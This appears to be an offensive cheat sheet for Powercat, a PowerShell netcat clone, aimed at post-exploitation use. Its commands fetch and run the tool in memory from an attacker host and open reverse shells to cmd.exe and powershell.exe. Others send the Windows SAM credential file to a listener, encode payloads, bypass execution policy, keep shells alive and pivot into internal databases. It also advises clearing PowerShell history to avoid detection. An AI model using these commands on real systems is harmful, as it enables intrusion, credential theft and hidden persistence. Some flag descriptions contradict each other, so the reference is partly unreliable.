Powercat is a PowerShell implementation of the classic netcat networking tool, providing flexible network communication capabilities for Windows systems. It enables TCP/UDP socket operations, file transfer, shell spawning, and network pivoting without requiring separate binaries. Powercat is essential for post-exploitation network operations and lateral movement within compromised networks.
# Clone from GitHub
git clone https://github.com/besimorhino/powercat.git
cd powercat
# Or download directly
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1" -OutFile powercat.ps1
# Import powercat into current session
. .\powercat.ps1
# Import and verify
Import-Module .\powercat.ps1 -Verbose
Get-Help powercat
# Temporarily bypass execution policy
powershell -ExecutionPolicy Bypass -File powercat.ps1
# Or bypass for current session
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Source directly from memory
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/powercat.ps1')"
| Command | Description |
|---|
powercat -l -p 4444 | Listen on port 4444 (server mode) |
powercat -c 192.168.1.100 -p 4444 | Connect to host on port 4444 (client mode) |
powercat -l -p 4444 -t 30 | Listen with 30-second timeout |
powercat -h | Display help information |
# Listen on TCP port 4444
powercat -l -p 4444
# Listen on all interfaces (0.0.0.0)
powercat -l -p 4444 -i 0.0.0.0
# Listen on specific interface
powercat -l -p 4444 -i 192.168.1.50
# Listen and accept incoming connections
powercat -l -p 4444
# Listen with verbose output
powercat -l -p 4444 -v
# Listen with connection timeout
powercat -l -p 4444 -t 60
# Listen on UDP port 4444
powercat -l -p 4444 -u
# UDP listener with verbose output
powercat -l -p 4444 -u -v
| Flag | Description |
|---|
-l | Listen mode (server) |
-p | Port number to bind/connect to |
-i | Interface IP address to bind to |
-u | Use UDP instead of TCP |
-t | Connection timeout in seconds |
-v | Verbose output |
# Connect to remote host TCP port 4444
powercat -c 192.168.1.100 -p 4444
# Connect to remote host via hostname
powercat -c attacker.com -p 4444
# Connect with verbose output
powercat -c 192.168.1.100 -p 4444 -v
# UDP client connection
powercat -c 192.168.1.100 -p 4444 -u
# UDP with timeout
powercat -c 192.168.1.100 -p 4444 -u -t 30
# Connect with 5-second delay (retry mechanism)
powercat -c 192.168.1.100 -p 4444 -d 5
# Persistent connection with reconnect
while($true) {
powercat -c 192.168.1.100 -p 4444
Start-Sleep -Seconds 5
}
| Flag | Description |
|---|
-c | Connect to host (client mode) |
-p | Port number to connect to |
-u | Use UDP protocol |
-t | Timeout in seconds |
-d | Delay before connection attempt |
# Server: Listen for incoming file
powercat -l -p 4444 -of C:\received_file.txt
# Client: Send file to listener
powercat -c 192.168.1.100 -p 4444 -i C:\file_to_send.txt
# Server: Listen and serve file
powercat -l -p 4444 -if C:\file_to_serve.txt
# Client: Connect and receive file
powercat -c 192.168.1.100 -p 4444 -of C:\received_file.txt
# Send and receive simultaneously
powercat -c 192.168.1.100 -p 4444 -i C:\send.txt -of C:\recv.txt
# Transfer large file with compression
$data = Get-Content -Path "C:\large_file.zip" -Encoding Byte
$encoded = [Convert]::ToBase64String($data)
$encoded | powercat -c 192.168.1.100 -p 4444
| Flag | Description |
|---|
-i | Input file to send |
-of | Output file to receive |
-if | Input file to serve to clients |
# Listener on attacker machine (Linux)
nc -lvnp 4444
# Powercat reverse shell on target
powercat -c 192.168.1.100 -p 4444 -e cmd.exe
# PowerShell reverse shell
powercat -c 192.168.1.100 -p 4444 -e powershell.exe
# Create reverse shell payload
$code = {
powercat -c 192.168.1.100 -p 4444 -e cmd.exe
}
# Execute in new PowerShell process
Start-Process powershell.exe -ArgumentList "-nop -c $code"
# Reverse shell over DNS
powercat -c 192.168.1.100 -p 4444 -dns
| Flag | Description |
|---|
-e | Execute command (cmd.exe, powershell.exe, etc.) |
-g | Generate payload (for staged delivery) |
-dns | DNS tunneling mode |
-rep | Enable relay/pivot mode |
# Relay TCP traffic between two hosts
powercat -l -p 4444 -c 192.168.1.200 -p 5555
# Relay with verbose output
powercat -l -p 4444 -c 192.168.1.200 -p 5555 -v
# Listen locally and forward to internal network
powercat -l -p 4444 -c 192.168.100.50 -p 3306
# Access internal MySQL through pivot
mysql -h 127.0.0.1 -P 4444 -u root -p
# Forward external traffic to internal service
powercat -l -p 80 -c 192.168.1.50 -p 8080
# Forward HTTPS to internal service
powercat -l -p 443 -c 192.168.1.50 -p 8443
# First hop: Intermediate server
powercat -l -p 4444 -c second-hop.internal -p 5555
# Second hop: Internal target
powercat -l -p 5555 -c 192.168.100.10 -p 22
# Generate base64 encoded payload
$payload = "powercat -c 192.168.1.100 -p 4444 -e cmd.exe"
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload))
# Execute encoded payload
powershell -EncodedCommand <base64_payload>
# Check if target is listening
function Test-Port {
param([string]$Server, [int]$Port)
try {
$socket = New-Object System.Net.Sockets.TcpClient
$socket.Connect($Server, $Port)
$socket.Close()
return $true
} catch {
return $false
}
}
if (Test-Port -Server "192.168.1.100" -Port 4444) {
powercat -c 192.168.1.100 -p 4444 -e cmd.exe
}
# Execute powercat in background job
$job = Start-Job -ScriptBlock {
. .\powercat.ps1
powercat -c 192.168.1.100 -p 4444 -e cmd.exe
}
# Monitor job
Get-Job
Receive-Job -Job $job
# Keep connection alive with heartbeat
while($true) {
try {
powercat -c 192.168.1.100 -p 4444 -e cmd.exe -t 300
} catch {
Start-Sleep -Seconds 10
}
}
# Listener on attacker machine (assume Linux)
nc -lvnp 4444
# Target machine executes reverse shell
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/powercat.ps1'); powercat -c 192.168.1.100 -p 4444 -e cmd.exe"
# Attacker listener captures file
nc -lvnp 4444 > exfiltrated_data.txt
# Target sends file
powercat -c 192.168.1.100 -p 4444 -i C:\Windows\System32\config\SAM
# Initial compromise creates relay
powercat -l -p 4444 -c internal-db-server.local -p 3306
# Attacker accesses internal database
mysql -h 127.0.0.1 -P 4444 -u admin -p
| Flag | Description |
|---|
-l | Listen mode |
-c | Connect to host |
-p | Port number |
-u | UDP mode |
-e | Execute command |
-i | Input file |
-of | Output file |
-if | Input file to serve |
-t | Timeout (seconds) |
-d | Delay (seconds) |
-v | Verbose output |
-rep | Relay mode |
-dns | DNS tunneling |
-g | Generate payload |
- Execution Policy: Always verify execution policy settings
- Logging: PowerShell command history logs activity
- Network Detection: Monitor for unusual outbound connections
- AMSI: Windows Defender may detect payloads
- Authorization: Ensure proper authorization before using
- Encryption: Consider encrypted tunnels for sensitive operations
- Timestamps: Clear PowerShell history if needed
- Post-exploitation: Execute reverse shells after initial compromise
- Network Pivoting: Route traffic through compromised systems
- File Transfer: Move data between systems without external tools
- Firewall Bypass: Use common ports (80, 443) for communication
- Lateral Movement: Access internal services from compromised host
- Data Exfiltration: Transfer sensitive files over network
- Test connectivity before complex operations
- Use appropriate timeouts for unstable networks
- Document all relay chains for troubleshooting
- Monitor PowerShell process behavior for detection avoidance
- Use encoding for payload delivery
- Verify file integrity after transfers
- Clean up connections and processes after use
# Verify listener is active
Get-NetTCPConnection -LocalPort 4444
# Check firewall rules
netsh advfirewall show allprofiles
# Use alternative execution methods
powershell -ExecutionPolicy Bypass
powershell -nop -c "..."
# Verify file paths
Test-Path C:\file.txt
# Check file permissions
Get-Acl C:\file.txt
- ncat — Advanced netcat implementation
- socat — Relay and tunneling utility
- chisel — Fast TCP/UDP tunneling
- ligolo-ng — Network tunneling tool
- plink — Command-line SSH client
